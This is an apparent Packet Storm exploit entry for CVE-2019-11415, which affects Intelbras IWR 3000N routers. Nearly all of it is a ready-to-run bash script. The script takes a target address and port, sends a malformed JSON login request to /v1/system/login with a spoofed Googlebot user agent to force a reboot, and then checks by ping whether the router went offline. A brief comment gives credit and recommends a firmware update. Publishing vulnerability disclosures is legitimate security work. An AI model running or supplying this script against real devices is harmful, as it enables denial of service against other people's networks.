Intelbras IWR 3000N Denial Of Service

2019-04-30T00:00:00
ID PACKETSTORM:152680
Type packetstorm
Reporter Social Engineering Neo
Modified 2019-04-30T00:00:00

Description

                                        
                                            `#/bin/bash  
  
# PoC based on CVE-2019-11415 created by Social Engineering Neo.  
#  
# Credit: https://1.337.zone/2019/04/08/intelbras-iwr-3000n-any-version-dos-on-malformed-login-request/  
#  
# A malformed login request allows remote attackers to cause a denial of service (reboot), as demonstrated by JSON misparsing of the \""} string to v1/system/login.  
#  
# Upgrade to latest firmware version iwr-3000n-1.8.7_0 for 3000n routers to prevent this issue.  
  
clear  
read -p "Enter Target Address Followed by Port: " target port # localhost 8080  
  
alive=$(ping -c 1 $target | grep icmp* | wc -l)  
if [ "$alive" -eq 0 ]; then  
echo Target May be Offline or Blocking ICMP requests.  
read -p "Would you Like to Proceed? (Y/n): " ans  
if [ "$ans" = 'n' ] || [ "$ans" = 'N' ]; then  
clear  
exit  
fi  
fi  
  
if [ "$port" -lt 65536 ] && [ "$port" -gt 0 ]; then  
grab=$(curl -s -A 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)' --compressed --data-binary '\""}' $target:$port/v1/system/login)  
else  
echo "Incorrect Port."  
fi  
  
clear  
alive=$(ping -c 1 $target | grep icmp* | wc -l)  
if [ "$alive" -eq 0 ]; then  
echo Router Successfully Taken Offline. #NOTE: if router blocks ICMP requests this may be inaccurate.  
else  
echo Exploit Unsuccessfull, Target May Not be Vulnerable.  
fi  
`